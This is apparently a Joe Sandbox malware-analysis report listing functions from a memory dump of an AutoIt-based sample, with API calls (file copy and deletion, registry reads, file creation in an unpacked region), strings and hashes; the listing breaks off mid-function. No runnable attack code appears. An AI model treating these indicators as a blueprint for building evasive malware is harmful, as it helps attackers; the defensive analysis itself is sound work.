Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 517819f65d71a0f4cbf575b0506da1f91722b2beafcb91aa11288b091a48b8de
Instruction ID: 68a49700e93ba54ff1a38b543ebc825cd27b599fb6df6ac406a14070ac35169b
Opcode Fuzzy Hash: 517819f65d71a0f4cbf575b0506da1f91722b2beafcb91aa11288b091a48b8de
Instruction Fuzzy Hash: 0DB20374608741DFD724DF24C894BAEB7E0BF85304F24491EF899872A1CB71E989DB86

Function 00C79155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C78F5F: __time64.LIBCMT ref: 00C78F69

Part of subcall function 00C14EE5: _fseek.LIBCMT ref: 00C14EFD

__wsplitpath.LIBCMT ref: 00C79234

Part of subcall function 00C340FB: __wsplitpath_helper.LIBCMT ref: 00C3413B

_wcscpy.LIBCMT ref: 00C79247
_wcscat.LIBCMT ref: 00C7925A
__wsplitpath.LIBCMT ref: 00C7927F
_wcscat.LIBCMT ref: 00C79295
_wcscat.LIBCMT ref: 00C792A8

Part of subcall function 00C78FA5: _memmove.LIBCMT ref: 00C78FDE
Part of subcall function 00C78FA5: _memmove.LIBCMT ref: 00C78FED

_wcscmp.LIBCMT ref: 00C791EF

Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79824
Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C79452
_wcsncpy.LIBCMT ref: 00C794C5
DeleteFileW.KERNEL32(?,?), ref: 00C794FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C79511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C79522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C79534

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: c956010794b2bacaf9e0761ca9f3b998ba11fe01883c4ec37f2b35fe43ca9020
Instruction ID: e25e9c67e9a14cbbb04740d6b88968984e16f8493228c298679b4036873b35c3
Opcode Fuzzy Hash: c956010794b2bacaf9e0761ca9f3b998ba11fe01883c4ec37f2b35fe43ca9020
Instruction Fuzzy Hash: 66C15CB1D00229AADF25DF95CC85EDEB7BDEF45310F0080AAF609E7151EB309A859F61

Function 00C1301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C13074
RegisterClassExW.USER32(00000030), ref: 00C1309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C130AF
InitCommonControlsEx.COMCTL32(?), ref: 00C130CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C130DC
LoadIconW.USER32(000000A9), ref: 00C130F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C13101

Strings

+, xrefs: 00C1305D
TaskbarCreated, xrefs: 00C130A4
0, xrefs: 00C13056
AutoIt v3 GUI, xrefs: 00C13090

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 0eb41353976f5be06cbf20ab7e76badc7c35a5fe5d4333fe782014abf0d76d58
Instruction ID: 71672453e8d2f570e82b2d8c87a74e2d33695a88dfb93dcbb8109e8529ad4b4c
Opcode Fuzzy Hash: 0eb41353976f5be06cbf20ab7e76badc7c35a5fe5d4333fe782014abf0d76d58
Instruction Fuzzy Hash: 403105B1941219AFDB409FA4EC89BDDBBF4FB09310F10412EE580E62A0D7B5459ACF90

Function 00C13A46 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C13A50
LoadCursorW.USER32(00000000,00007F00), ref: 00C13A5F
LoadIconW.USER32(00000063), ref: 00C13A76
LoadIconW.USER32(000000A4), ref: 00C13A88
LoadIconW.USER32(000000A2), ref: 00C13A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C13AC0
RegisterClassExW.USER32(?), ref: 00C13B16

Part of subcall function 00C13041: GetSysColorBrush.USER32(0000000F), ref: 00C13074
Part of subcall function 00C13041: RegisterClassExW.USER32(00000030), ref: 00C1309E
Part of subcall function 00C13041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C130AF
Part of subcall function 00C13041: InitCommonControlsEx.COMCTL32(?), ref: 00C130CC
Part of subcall function 00C13041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C130DC
Part of subcall function 00C13041: LoadIconW.USER32(000000A9), ref: 00C130F2
Part of subcall function 00C13041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C13101

Strings

0, xrefs: 00C13AF4
#, xrefs: 00C13AFB
(l, xrefs: 00C13AA1
AutoIt v3, xrefs: 00C13B05

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$(l$0$AutoIt v3
API String ID: 423443420-1873447343
Opcode ID: 1a63197033b604bd4e3f58479252a33be0947e33389b3f6625b545e63fbab157
Instruction ID: cfe1d9f90afb732822162ea30104adfbaf16c267a76ce14597b0ebecb4fac47a
Opcode Fuzzy Hash: 1a63197033b604bd4e3f58479252a33be0947e33389b3f6625b545e63fbab157
Instruction Fuzzy Hash: 10213770902308AFEB10DFA4EC09BAD7BB0FB08716F10012BF504EA2A1D7B556589F84

Function 00C13041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C13074
RegisterClassExW.USER32(00000030), ref: 00C1309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C130AF
InitCommonControlsEx.COMCTL32(?), ref: 00C130CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C130DC
LoadIconW.USER32(000000A9), ref: 00C130F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C13101

Strings

+, xrefs: 00C1305D
TaskbarCreated, xrefs: 00C130A4
0, xrefs: 00C13056
AutoIt v3 GUI, xrefs: 00C13090

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: cbe926299ddfcce67812fbdeab4c92dac54fc5bec9a4f0a6b5c4f92fe9ebec57
Instruction ID: f2731a3f60fdee52de31ae444f69b32aac15812c3477bb8e2a666026a00e40d4
Opcode Fuzzy Hash: cbe926299ddfcce67812fbdeab4c92dac54fc5bec9a4f0a6b5c4f92fe9ebec57
Instruction Fuzzy Hash: E921C0B1942618AFDB00DFA8EC89BDDBBF8FB08701F10412BFA10E62A0D7B145559F91

Function 00C1708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C14706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CD52F8,?,00C137AE,?), ref: 00C14724

Part of subcall function 00C3050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C17165), ref: 00C3052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C171A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C4E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C4E909
RegCloseKey.ADVAPI32(?), ref: 00C4E947
_wcscat.LIBCMT ref: 00C4E9A0

Strings

Include, xrefs: 00C4E8BF, 00C4E900
\Include\, xrefs: 00C17165
\, xrefs: 00C4E9C3
Software\AutoIt v3\AutoIt, xrefs: 00C1719E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 8fb1a3607b94576a255b7bee7d7cfaa2d24f4339feb2a02a103876b308ce77d1
Instruction ID: 46ce5c5417486c0b868a2466d8359699cfe9ada9f2fd1a52065faabac32df4b3
Opcode Fuzzy Hash: 8fb1a3607b94576a255b7bee7d7cfaa2d24f4339feb2a02a103876b308ce77d1
Instruction Fuzzy Hash: 1C716C715093019EC700EF65E881AAFBBF8FF95310F40092EF445C71A1EB719949DB92

Function 00C13766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00C4D213
/AutoIt3OutputDebug, xrefs: 00C13892
/AutoIt3ExecuteLine, xrefs: 00C138A7
/AutoIt3ExecuteScript, xrefs: 00C138BC
CMDLINE, xrefs: 00C13822
CMDLINERAW, xrefs: 00C137FB
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00C137AE
/ErrorStdOut, xrefs: 00C1387D

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$
API String ID: 1825951767-2885450264
Opcode ID: 7a57b76497047cf940b312afd9e4221eaf1321aef4f58feacc1dc9edb271d095
Instruction ID: 24def29bb09bb11c19d302b395ce5e5fbd7f4bdb3d042682cb89d885fa4d9e87
Opcode Fuzzy Hash: 7a57b76497047cf940b312afd9e4221eaf1321aef4f58feacc1dc9edb271d095
Instruction Fuzzy Hash: B8A1A07190021D9ACF05EBA0DC95EEEB778FF16314F00002AF416B7191EF709A89EBA0

Function 00C13633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00C136D2
KillTimer.USER32(?,00000001), ref: 00C136FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C1371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C1372A
CreatePopupMenu.USER32 ref: 00C1373E
PostQuitMessage.USER32(00000000), ref: 00C1374D

Strings

TaskbarCreated, xrefs: 00C13725

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: e36f3a80b58e8b5bb46bff031bafe61ef4725dfad68be834665e86fe1a3fdbf9
Instruction ID: 9fd7d11072b318a199fe3af3c4d7e7c87f1e0fe6f5becf4374f145c4eac292e8
Opcode Fuzzy Hash: e36f3a80b58e8b5bb46bff031bafe61ef4725dfad68be834665e86fe1a3fdbf9
Instruction Fuzzy Hash: EE4104F1200585FBDB24AF64ED09BFD3B55FB07305F14012AFA12D62E1DA609B85B6A1

Function 00C139D5 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C13A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C13A24
ShowWindow.USER32(00000000,?,?), ref: 00C13A38
ShowWindow.USER32(00000000,?,?), ref: 00C13A41

Strings

) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the, xrefs: 00C139F6
edit, xrefs: 00C13A1E
AutoIt v3, xrefs: 00C139FB, 00C13A00, 00C13A01

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$CreateShow
String ID: ) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the$AutoIt v3$edit
API String ID: 1584632944-48068084
Opcode ID: 23255da47cf9abbceb3545050421dff8cb9dc6909cdd26c87623883378348040
Instruction ID: f4b54e44a04e13fd4bf8279e5924b6fe6ea2e8a32c3672ced0067db3d0bef0e8
Opcode Fuzzy Hash: 23255da47cf9abbceb3545050421dff8cb9dc6909cdd26c87623883378348040
Instruction Fuzzy Hash: 22F03474602290BEEA305B23AC8CF6F3F7DE7C6F50B02002FB900E21B0C6610806DAB0

Function 010275C0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01027691
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010278B7

Memory Dump Source

Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: cb61eea5a980b3c86e11a96612b872cc5cdd84f8ade16772a6c408417ae83073
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: 87A12A74E00219EBDB14CFA8C894BEEBBB5FF58304F208599E641BB281D7759A41CF94

Function 01027390 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01027280: Sleep.KERNELBASE(000001F4), ref: 01027291

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010274AF

Strings

SVM98D9L4XE, xrefs: 01027512, 01027515

Memory Dump Source

Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd

Similarity

API ID: CreateFileSleep
String ID: SVM98D9L4XE
API String ID: 2694422964-2928599538
Opcode ID: ee4bdea5bc9ed4ae22841a431094ceab17212766985a34bcc457ecc2fc500011
Instruction ID: 1eb92ed5054f7bb7c319c92a228d7de447f5093dcdf5479678b9570e39ea99b7
Opcode Fuzzy Hash: ee4bdea5bc9ed4ae22841a431094ceab17212766985a34bcc457ecc2fc500011
Instruction Fuzzy Hash: 51517130D04259EBEF15DBB4C814BEEBB79AF58300F004599E648BB2C0DBB91B45CBA5

Function 00C1407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C4D3D7

Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06

_memset.LIBCMT ref: 00C140FC
_wcscpy.LIBCMT ref: 00C14150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C14160

Strings

Line: , xrefs: 00C4D400

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 57efd98cf7eba6775db6a09c8b71c126bac42c7ff3a6b4a6dc9125423e6949e7
Instruction ID: 92ce8a973995198470077802af5430e7f7b7876de9a97ba8a9b28464ddd69299
Opcode Fuzzy Hash: 57efd98cf7eba6775db6a09c8b71c126bac42c7ff3a6b4a6dc9125423e6949e7
Instruction Fuzzy Hash: 8A31D171008304AFD724EB60DC46FDF77E8AF46300F104A1FF685921A1EB70A689E782

Function 00C3541D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00C3547B
_memcpy_s.LIBCMT ref: 00C354ED
__read_nolock.LIBCMT ref: 00C3554B
__filbuf.LIBCMT ref: 00C3556E
_memset.LIBCMT ref: 00C355B2

Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 1ef301eb67ddd39fa5b9b787140574da38843d496cc3e26b5d185cbaa7cf72de
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: F551C870A20B05DBDB289F69D88066E77B6AF40331F248729F835962D0D771EE909B41

Function 00C1686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00C14DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14E0F

_free.LIBCMT ref: 00C4E263
_free.LIBCMT ref: 00C4E2AA

Part of subcall function 00C16A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C16BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00C4E039
Bad directive syntax error, xrefs: 00C4E292

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: c659117834b7aa4e413df708321ebc92db0db9849f404ad5620755b5fb1caaf2
Instruction ID: cc12e85d8f29835df4b3e6f1fd3d7fbc127b8df0f62f428601d13336104143dd
Opcode Fuzzy Hash: c659117834b7aa4e413df708321ebc92db0db9849f404ad5620755b5fb1caaf2
Instruction Fuzzy Hash: 64919E71910219EFCF14EFA4CC919EDB7B8FF05310F11452AF826AB2A1DB70AA55EB50

Function 00C1F76F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C30162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C30193
Part of subcall function 00C30162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C3019B
Part of subcall function 00C30162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C301A6
Part of subcall function 00C30162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C301B1
Part of subcall function 00C30162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C301B9
Part of subcall function 00C30162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C301C1

Part of subcall function 00C260F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C1F930), ref: 00C26154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C1F9CD
